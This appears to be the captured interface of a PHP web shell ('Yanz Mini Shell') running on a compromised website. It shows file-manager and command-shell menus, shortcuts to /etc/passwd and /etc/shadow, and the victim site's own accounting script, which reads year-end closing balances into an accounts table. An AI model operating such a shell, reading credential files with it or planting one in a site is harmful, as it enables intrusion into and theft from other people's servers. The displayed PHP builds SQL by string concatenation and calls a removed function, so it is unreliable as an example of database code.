Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
housgcjs
elaan.net
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php $path="admin/orna/"; require_once('admin/orna/db.php'); //COPYING OPENING BALANCES TO ACC_MAST TABLE FROM year_closing_balance $sql_year_closing_balance="select * from `".$MySQL_database."`.year_closing_balance where closing_id='1' order by acc_nm ASC"; $query_year_closing_balance=mysqli_query($connection,$sql_year_closing_balance); while($year_closing_balance=mysqli_fetch_assoc($query_year_closing_balance)){ if(!mysqli_query($connection,"update `".$MySQL_database."`.acc_mast set opbal='".$year_closing_balance['year_closing']."' where acc_nm='".$year_closing_balance['acc_nm']."'")){ mysqli_query($connection,"update year_closing set log='Unable to copy Opening Balances to acc_mast ".mysql_error()."' where id='1'"); die("Unable to copy Opening Balances to acc_mast ".mysql_error()); }; }; ?>
Free Space : 77943406592 Byte